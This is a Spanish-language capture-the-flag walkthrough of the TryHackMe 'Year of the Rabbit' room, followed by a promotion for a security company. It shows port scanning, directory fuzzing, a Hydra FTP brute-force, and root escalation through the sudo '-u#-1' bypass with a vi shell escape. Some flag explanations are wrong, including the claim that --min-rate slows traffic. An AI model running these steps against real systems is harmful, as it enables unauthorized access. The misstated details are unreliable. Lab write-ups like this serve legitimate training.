Hoy traemos el Manual de Pentesting para principiantes en la plataforma Year of the Rabbit TryHackMe URL: https://tryhackme.com/room/yearoftherabbit

Year of the Rabbit TryHackMe

Paso 1: Preparación

Lo primero que debemos hacer es crear un directorio de trabajo para realizar el pentesting. Esto nos ayudará a mantener organizados todos los archivos y resultados generados durante el proceso.

mkdir yearoftherabbit
cd yearoftherabbit

A continuación, debemos añadir la dirección IP de la máquina objetivo al archivo de hosts para poder acceder a ella fácilmente.

sudo nano /etc/hosts

Agrega la siguiente línea al final del archivo, reemplazando <ipmaquina> con la dirección IP de la máquina objetivo:

<ipmaquina> yearoftherabbit.thm

Guarda los cambios y cierra el editor.

Paso 2: Identificación del sistema operativo de Year of the Rabbit TryHackMe

Antes de comenzar el escaneo de puertos, es útil confirmar la conectividad y determinar el sistema operativo de la máquina objetivo. Para ello, realizaremos un ping y observaremos el valor TTL en la respuesta.

ping -c 1 yearoftherabbit.thm

Si el valor TTL es 63, es probable que estemos ante una máquina Linux.

Year Of The Rabbit Try Hack Me Ping

Paso 3: Escaneo de puertos

El siguiente paso es realizar un escaneo de puertos en la máquina objetivo para identificar los servicios disponibles. Utilizaremos la herramienta Nmap para esto.

nmap -p- --open -sSCV --min-rate 5000 -vvv -n -Pn yearoftherabbit.thm -oN nmap_yearoftherabbit

Explicación de los comandos y flags utilizados:

  • -p-: Escanea todos los puertos.
  • --open: Muestra solo los puertos abiertos.
  • -sS: Realiza un escaneo TCP SYN.
  • -C: Realiza un escaneo con scripts de enumeración básica.
  • -V: Aumenta el nivel de detalles de la versión del servicio.
  • --min-rate 5000: Limita la velocidad de envío de paquetes para evitar la detección.
  • -vvv: Muestra una salida detallada.
  • -n: No realiza resolución de DNS.
  • -Pn: Ignora la detección de hosts y trata todas las direcciones IP como en línea.
  • -oN nmap_yearoftherabbit: Guarda la salida en un archivo llamado «nmap_yearoftherabbit».

Este escaneo nos mostrará los puertos abiertos y los servicios correspondientes, como el FTP (puerto 21), SSH (puerto 22) y Apache (puerto 80).

Year Of The Rabbit Nmap1

Paso 4: Inspección del FTP y la web de Year of the Rabbit TryHackMe

Ahora que conocemos los puertos abiertos, podemos realizar una inspección de los directorios de la web utilizando la herramienta wfuzz. Esto nos permitirá descubrir posibles rutas y archivos interesantes.

wfuzz -c --h=404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://yearoftherabbit.thm:80/FUZZ

Explicación de los comandos y flags utilizados:

  • -c: Coloriza la salida.
  • --h=404: Ignora las respuestas 404 (no encontradas).
  • -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt: Utiliza un archivo de palabras para realizar la enumeración de directorios.
  • -u http://yearoftherabbit.thm:80/FUZZ: Especifica la URL objetivo y usa «FUZZ» como comodín para reemplazarlo con las palabras del archivo.
Year Of The Rabbit Wfuzz

Este comando buscará directorios y archivos en la web y mostrará cualquier resultado interesante. Accedemos a el y vemos lo siguiente.

Year Of The Rabbit Directorio

Paso 5: Investigación del directorio oculto

En el paso anterior, hemos encontrado un directorio oculto. Para obtener más información sobre este directorio, ya que nos redirige a otra página, utilizaremos la herramienta Burp Suite. Burp Suite nos permitirá interceptar y analizar el tráfico HTTP.

Year Of The Rabbit Java

Abre Burp Suite e importa el certificado raíz en tu navegador siguiendo las instrucciones proporcionadas por la herramienta.

Configura tu navegador para usar el proxy de Burp Suite y visita la URL del directorio oculto encontrado en el paso anterior. Examina cuidadosamente las respuestas y los elementos presentes en la página para obtener información adicional.

Year Of The Rabbit Burpsuite

Paso 6: Descarga y análisis de una imagen en Year of the Rabbit TryHackMe

En el directorio oculto, encontramos una imagen que puede contener información oculta. Descargaremos la imagen utilizando la herramienta wget.

wget http://yearoftherabbit.thm:80/imagen.jpg
Year Of The Rabbit Imagen

Luego, analizaremos la imagen en busca de información oculta utilizando la herramienta binwalk.

binwalk imagen.jpg -e --run-as=root

Explicación de los comandos y flags utilizados:

  • -e: Extrae los archivos incrustados en la imagen.
  • --run-as=root: Ejecuta binwalk con privilegios de root para acceder a archivos restringidos.

Binwalk nos mostrará cualquier archivo oculto o información incrustada en la imagen.

Year Of The Rabbir Try Hack Me Binwalk

Paso 7: Análisis de los archivos extraídos

Ahora que hemos extraído los archivos incrustados en la imagen, utilizaremos el comando cat para ver el contenido de cada archivo y buscar información relevante.

cat archivo1.txt
cat archivo2.txt
...

Uno de los archivos puede contener una serie de contraseñas y un usuario de FTP.

Year Of The Rabbit Try Hack Me Cat

Paso 8: Guardar las contraseñas

Guardaremos las posibles contraseñas en un archivo llamado «contraseñas.txt» para su posterior uso.

nano contraseñas.txt

Copia las contraseñas encontradas en el paso anterior y péguelas en el archivo. Guarda los cambios y cierra el editor.

Year Of The Rabbit Try Hack Me Ftp User

Paso 9: Ataque de contraseña a FTP de Year of the Rabbit TryHackMe

Utilizaremos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña.

hydra -l <usuario_ftp> -P contraseñas.txt ftp://yearoftherabbit.thm

Reemplaza <usuario_ftp> con el usuario de FTP encontrado en los pasos anteriores.

Hydra intentará diferentes contraseñas utilizando la lista proporcionada en el archivo «contraseñas.txt».

Year Of The Rabbit Try Hack Me Hydra

Paso 10: Descarga y análisis de un archivo en FTP

Una vez hayas obtenido acceso al servidor FTP, descarga cualquier archivo que encuentres relevante utilizando el comando get archivo.txt. Luego, sal del servidor FTP y analiza el contenido del archivo descargado mediante el comando cat.

ftp year

oftherabbit.thm
get archivo.txt
exit
cat archivo.txt
Year Of The Rabbit Try Hack Me Ftp

Paso 11: Decodificación de un archivo codificado en Brainfuck

Si el archivo descargado está codificado en Brainfuck, accede al sitio web https://www.dcode.fr/brainfuck-language y pega el contenido del archivo en el campo de entrada. Luego, haz clic en «Decode» para obtener el mensaje decodificado.

Year Of The Rabbit Try Hack Me Brainfuck

Paso 12: Acceso SSH utilizando las credenciales obtenidas a Year of the Rabbit TryHackMe

Una vez hayas decodificado el archivo y obtenido las credenciales de SSH, utiliza el siguiente comando para acceder a la máquina objetivo.

ssh <usuario>@yearoftherabbit.thm

Reemplaza <usuario> con el usuario obtenido.

Year Of The Rabbit Try Hack Me Ssh 1

Paso 13: Lectura de un archivo oculto para otro usuario

Una vez hayas accedido por SSH, busca y lee el archivo oculto mencionado en el mensaje utilizando el comando cat.

cat archivo_oculto.txt

En este archivo encontrarás una nueva contraseña para otro usuario.

Year Of The Rabbit Try Hack Me Ssh2

Paso 14: Escalada de privilegios en Year of the Rabbit TryHackMe

Sal del usuario actual utilizando el comando exit y accede nuevamente por SSH utilizando las nuevas credenciales obtenidas en el paso anterior.

ssh <otro_usuario>@yearoftherabbit.thm

Reemplaza <otro_usuario> con el usuario obtenido.

Year Of The Rabbit Try Hack Me User Flag

Paso 15: Escalada de privilegios con sudo en Year of the Rabbit TryHackMe

Verifica los privilegios disponibles utilizando el comando sudo -l. Observa si existe alguna oportunidad para escalar privilegios mediante el comando vi.

sudo -l

En este caso, se observa que es posible escalar privilegios mediante el comando vi.

Year Of The Rabbit Try Hack Me Sudo L

Paso 16: Escalada de privilegios con sudo y vi en Year of the Rabbit TryHackMe

Aprovecha una vulnerabilidad en la versión de sudo para escalar privilegios ejecutando el siguiente comando:

sudo -u#-1 /usr/bin/vi user.txt

Esto permitirá ejecutar el editor vi con privilegios de root y acceder al archivo «user.txt».

Paso 17: Obtención de acceso root

Una vez dentro del editor vi, ingresa :!/bin/sh y presiona Enter. Ahora tendrás acceso root a la máquina objetivo.

Recuerda que realizar pruebas de penetración en sistemas o redes sin permiso y autorización es ilegal. Asegúrate siempre de obtener el consentimiento del propietario del sistema o red antes de realizar cualquier actividad de pentesting.

Try Hack Me Sudo 11
Year Of The Rabbit Try Hack Me Sudo 4

Resumen Year of the Rabbit TryHackMe

En este manual, hemos llevado a cabo el pentesting de la máquina Year of the Rabbit de la plataforma Try Hack Me. Comenzamos preparándonos creando un directorio de trabajo y agregando la máquina objetivo al archivo de hosts.

A continuación, realizamos una identificación del sistema operativo utilizando el comando ping y observando el valor TTL. Luego, llevamos a cabo un escaneo de puertos utilizando la herramienta Nmap para descubrir los servicios y puertos abiertos en la máquina.

Realizamos una inspección de los directorios de la web utilizando la herramienta wfuzz, buscando posibles directorios ocultos. Utilizamos Burp Suite para investigar un directorio oculto y obtener más información.

Descargamos y analizamos una imagen encontrada en el directorio oculto utilizando las herramientas wget y binwalk. Exploramos los archivos extraídos y examinamos su contenido.

Guardamos las contraseñas encontradas en un archivo y utilizamos la herramienta Hydra para realizar un ataque de fuerza bruta al servidor FTP y descubrir la contraseña. Descargamos y analizamos un archivo del servidor FTP.

Decodificamos un archivo codificado en Brainfuck utilizando un sitio web especializado. Accedimos por SSH utilizando las credenciales obtenidas y leímos un archivo oculto para otro usuario.

Realizamos una escalada de privilegios aprovechando una vulnerabilidad en sudo y vi. Finalmente, obtuvimos acceso root a la máquina objetivo.

¡Únete a DCSeguridad y contáctanos hoy mismo!

DCSeguridad es una empresa líder en el campo de la seguridad informática y el pentesting. Nuestro equipo de expertos altamente calificados y con amplia experiencia está listo para ayudarte a proteger tu infraestructura digital.

Si estás interesado en fortalecer la seguridad de tu empresa, te invitamos a que te pongas en contacto con nosotros. Ofrecemos servicios personalizados y soluciones integrales para proteger tus sistemas contra posibles amenazas y vulnerabilidades.

Además, te invitamos a unirte a nuestro canal de Telegram, donde compartimos contenido exclusivo sobre seguridad informática, consejos, últimas tendencias y noticias del mundo de la ciberseguridad. Es una excelente oportunidad para mantenerte actualizado y aprender de los mejores en el campo.

En DCSeguridad, entendemos la importancia de la seguridad en la era digital y estamos comprometidos en brindarte soluciones confiables y efectivas. No escatimamos esfuerzos para asegurar la confidencialidad, integridad y disponibilidad de tu información.

¡No esperes más y protégete con DCSeguridad! Contáctanos hoy mismo y únete a nuestro canal de Telegram para acceder a un mundo de conocimiento y seguridad digital.

Recuerda que el pentesting debe realizarse siempre con permiso y autorización.